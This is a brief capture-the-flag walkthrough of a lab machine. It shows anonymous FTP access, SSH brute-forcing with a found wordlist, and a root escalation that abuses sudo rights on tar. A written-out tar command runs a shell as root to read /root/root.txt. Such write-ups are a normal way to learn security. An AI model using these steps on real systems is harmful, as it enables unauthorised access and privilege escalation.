syn Enumeration
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open httpWe’ve got 3 ports open, we can start with FTP to see if we have anonymous access:
User own
We can access this without a password and see there’s a couple files available, let’s look at the task file:
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-linTask gives us a username, locks looks to be a wordlist. As per our hint, we can try bruteforce the SSH service:
We can SSH in and immediately get our user flag.
Root own
We pretty much immediately see our path to root. We can tar available to run as root (with a password):
https://gtfobins.github.io/gtfobins/tar/At this point it’s just pick your favourite, let’s try something slightly less common just read the file:
sudo tar xf "/root/root.txt" -I '/bin/sh -c "cat 1>&2"'We get the root flag with no issues.
